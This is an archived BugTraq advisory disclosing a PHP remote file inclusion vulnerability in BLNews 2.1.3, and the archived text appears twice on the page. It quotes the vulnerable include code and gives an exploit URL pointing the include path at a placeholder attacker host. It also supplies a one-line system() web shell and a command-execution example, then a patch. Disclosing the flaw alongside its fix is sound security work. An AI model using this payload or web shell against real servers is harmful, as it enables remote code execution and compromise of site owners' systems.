BugTraq
Back to list
|
Post reply
PHP source code injection in BLNews
May 24 2003 11:27AM
Over_G (overg mail ru)
Product: BLNews
Version: 2.1.3
OffSite: http://www.blnews.de/
Problem: PHP source code injection
--------------------------------------------
Vulnerability:
------------admin/objects.inc.php4------------
if ($itheme!="blubb")
{ include("$Server[path]/admin/tools.inc.php4"); }
include("$Server[path]/admin/$Server[language_file]");
-----------------------------------------------------
The developers forgot write include("server.inc.php4") :)
Exploit: admin/objects.inc.php4?Server[path]=http://ATACKER&Server[language_file]
=cmd.php4
with
http://ATACKER/admin/tools.inc.php4
http://ATACKER/admin/cmd.php4
with
<? system($cmd) ?>
Use: objects.inc.php4?Server[path]=http://ATACKER&cmd=id;uname -a;pwd;
Patch.
write before line if ($itheme!="blubb")
include("server.inc.php4");
Contacts: www.overg.com www.dwcgr0up.com
irc.irochka.net #DWC
overg (at) mail (dot) ru [email concealed]
regards, Over G[DWC Gr0up]
[ reply ]
Privacy Statement
Copyright 2010, SecurityFocus
Version: 2.1.3
OffSite: http://www.blnews.de/
Problem: PHP source code injection
--------------------------------------------
Vulnerability:
------------admin/objects.inc.php4------------
if ($itheme!="blubb")
{ include("$Server[path]/admin/tools.inc.php4"); }
include("$Server[path]/admin/$Server[language_file]");
-----------------------------------------------------
The developers forgot write include("server.inc.php4") :)
Exploit: admin/objects.inc.php4?Server[path]=http://ATACKER&Server[language_file]
=cmd.php4
with
http://ATACKER/admin/tools.inc.php4
http://ATACKER/admin/cmd.php4
with
<? system($cmd) ?>
Use: objects.inc.php4?Server[path]=http://ATACKER&cmd=id;uname -a;pwd;
Patch.
write before line if ($itheme!="blubb")
include("server.inc.php4");
Contacts: www.overg.com www.dwcgr0up.com
irc.irochka.net #DWC
overg (at) mail (dot) ru [email concealed]
regards, Over G[DWC Gr0up]
[ reply ]